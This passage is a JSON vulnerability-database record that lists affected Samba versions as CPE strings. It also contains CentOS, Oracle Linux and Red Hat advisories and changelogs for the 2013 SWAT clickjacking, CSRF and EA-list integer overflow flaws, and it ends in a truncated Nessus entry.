"cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:29:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0305\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-March/032242.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-swat\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0305.html", "edition": 3, "modified": "2014-03-17T19:05:31", "published": "2014-03-17T19:05:31", "href": "http://lists.centos.org/pipermail/centos-announce/2014-March/032242.html", "id": "CESA-2014:0305", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:27:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1310\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked to in\nthe References, for information on the most significant of these changes.\n\nAll samba3x users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-October/007072.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1310.html", "edition": 3, "modified": "2013-10-07T12:45:09", "published": "2013-10-07T12:45:09", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-October/007072.html", "id": "CESA-2013:1310", "title": "samba3x security update", "type": "centos", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1542\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the\nSamba server.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll samba users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007276.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1542.html", "edition": 3, "modified": "2013-11-26T13:32:51", "published": "2013-11-26T13:32:51", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007276.html", "id": "CESA-2013:1542", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "[3.6.6-0.136]\r\n- resolves: #984807 - CVE-2013-4124: DoS via integer overflow when reading\r\n an EA list\r\n \n[3.6.6-0.135]\r\n- Fix PIDL parsing with newer versions of gcc.\r\n- Fix dereferencing a unique pointer in the WKSSVC server.\r\n- resolves: #982484\r\n \n[3.6.6-0.134]\r\n- Check for system libtevent and require version 0.9.18.\r\n- Use tevent epoll backend in winbind.\r\n- resolves: #869295\r\n \n[3.6.6-0.133]\r\n- Fix smbstatus code dump when a file entry has delete tokens.\r\n- resolves: #962840\r\n \n[3.6.6-0.132]\r\n- Fix possible segfaults with group caching patch.\r\n- related: #948923\r\n \n[3.6.6-0.131]\r\n- Fix CVE-2013-0213 and CVE-2013-0214.\r\n- resolves: #957591\r\n \n[3.6.6-0.130]\r\n- Fix netlogon failover for LogonSamLogon.\r\n- resolves: #862872\r\n- Fix write operations as guest with security = share\r\n- resolves: #905071\r\n- Disable building cifs idmap and acl binaries.\r\n- resolves: #873692\r\n- Change chkconfig order to start winbind before netfs.\r\n- resolves: #948614\r\n- Fix cache issue when resoliving groups without domain name.\r\n- resolves: #948923\r\n- Fix pam_winbind upn to username conversion if you have different seperator.\r\n- resolves: #949611\r\n- Fix the username map optimization.\r\n- resolves: #917564\r\n- Fix leaking sockets of smb dc connection.\r\n- resolves: #883861\r\n- Fix 'net ads keytab add' not respecting the case.\r\n- resolves: #955680\r\n- Fix 'map untrusted to domain' with NTLMv2.\r\n- resolves: #947999", "edition": 4, "modified": "2013-10-06T00:00:00", "published": "2013-10-06T00:00:00", "id": "ELSA-2013-1310", "href": "http://linux.oracle.com/errata/ELSA-2013-1310.html", "title": "samba3x security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "[3.6.9-164]\r\n- resolves: #1008574 - Fix offline logon cache not updating for cross child\r\n domain group membership.\r\n \n[3.6.9-163]\r\n- resolves: #1015359 - Fix CVE-2013-0213 and CVE-2013-0214 in SWAT.\r\n \n[3.6.9-162]\r\n- resolves: #978007 - Fix 'valid users' manpage documentation.\r\n \n[3.6.9-161]\r\n- resolves: #997338 - Fix smbstatus as non root user.\r\n- resolves: #1003689 - Fix Windows 8 printer driver support.\r\n \n[3.6.9-160]\r\n- resolves: #948071 - Group membership is not correct on logins with new\r\n AD groups.\r\n- resolves: #953985 - User and group info not return from a Trusted Domain.\r\n \n[3.6.9-159]\r\n- resolves: #995109 - net ads join - segmentation fault if no realm has been\r\n specified.\r\n- List all vfs, auth and charset modules in the spec file.\r\n \n[3.6.9-158]\r\n- resolves: #984808 - CVE-2013-4124: DoS via integer overflow when reading\r\n an EA list\r\n \n[3.6.9-157]\r\n- Fix Windows 8 Roaming Profiles.\r\n- resolves: #990685\r\n \n[3.6.9-156]\r\n- Fix PIDL parsing with newer versions of gcc.\r\n- Fix dereferencing a unique pointer in the WKSSVC server.\r\n- resolves: #980382\r\n \n[3.6.9-155]\r\n- Check for system libtevent and require version 0.9.18.\r\n- Use tevent epoll backend in winbind.\r\n- resolves: #951175\r\n \n[3.6.9-154]\r\n- Add encoding option to 'net printing (migrate|dump)' command.\r\n- resolves: #915455\r\n \n[3.6.9-153]\r\n- Fix overwrite of errno in check_parent_exists().\r\n- resolves: #966489\r\n- Fix dir code using dirfd() without vectoring trough VFS calls.\r\n- resolves: #971283\r\n \n[3.6.9-152]\r\n- Fix 'map untrusted to domain' with NTLMv2.\r\n- resolves: #961932\r\n- Fix the username map optimization.\r\n- resolves: #952268\r\n- Fix 'net ads keytab add' not respecting the case.\r\n- resolves: #955683\r\n- Fix write operations as guest with security = share\r\n- resolves: #953025\r\n- Fix pam_winbind upn to username conversion if you have different seperator.\r\n- resolves: #949613\r\n- Change chkconfig order to start winbind before netfs.\r\n- resolves: #948623\r\n- Fix cache issue when resoliving groups without domain name.\r\n- resolves: #927383", "edition": 4, "modified": "2013-11-25T00:00:00", "published": "2013-11-25T00:00:00", "id": "ELSA-2013-1542", "href": "http://linux.oracle.com/errata/ELSA-2013-1542.html", "title": "samba security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "[3.0.33-3.40.el5]\n- Security Release, fixes CVE-2013-0213 and CVE-2013-4124\n- resolves: #1073350", "edition": 4, "modified": "2014-03-17T00:00:00", "published": "2014-03-17T00:00:00", "id": "ELSA-2014-0305", "href": "http://linux.oracle.com/errata/ELSA-2014-0305.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba3x packages also include numerous bug fixes. Space\nprecludes documenting all of these changes in this advisory. Users are\ndirected to the Red Hat Enterprise Linux 5.10 Technical Notes, linked to in\nthe References, for information on the most significant of these changes.\n\nAll samba3x users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T12:12:23", "published": "2013-09-30T20:52:28", "id": "RHSA-2013:1310", "href": "https://access.redhat.com/errata/RHSA-2013:1310", "type": "redhat", "title": "(RHSA-2013:1310) Moderate: samba3x security and bug fix update", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:51:00", "published": "2014-03-17T04:00:00", "id": "RHSA-2014:0305", "href": "https://access.redhat.com/errata/RHSA-2014:0305", "type": "redhat", "title": "(RHSA-2014:0305) Moderate: samba security update", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:00", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the\nSamba server.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nThese updated samba packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll samba users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement. After installing this update, the smb service will be\nrestarted automatically.\n", "modified": "2018-06-06T20:24:30", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1542", "href": "https://access.redhat.com/errata/RHSA-2013:1542", "type": "redhat", "title": "(RHSA-2013:1542) Moderate: samba security, bug fix, and enhancement update", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:48:13", "description": "It was discovered that the Samba Web Administration Tool (SWAT) did\nnot protect against being opened in a web page frame. A remote\nattacker could possibly use this flaw to conduct a clickjacking attack\nagainst SWAT users or users with an active SWAT session.\n(CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a\nvictim's password could use this flaw to bypass CSRF protections and\nconduct a CSRF attack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled 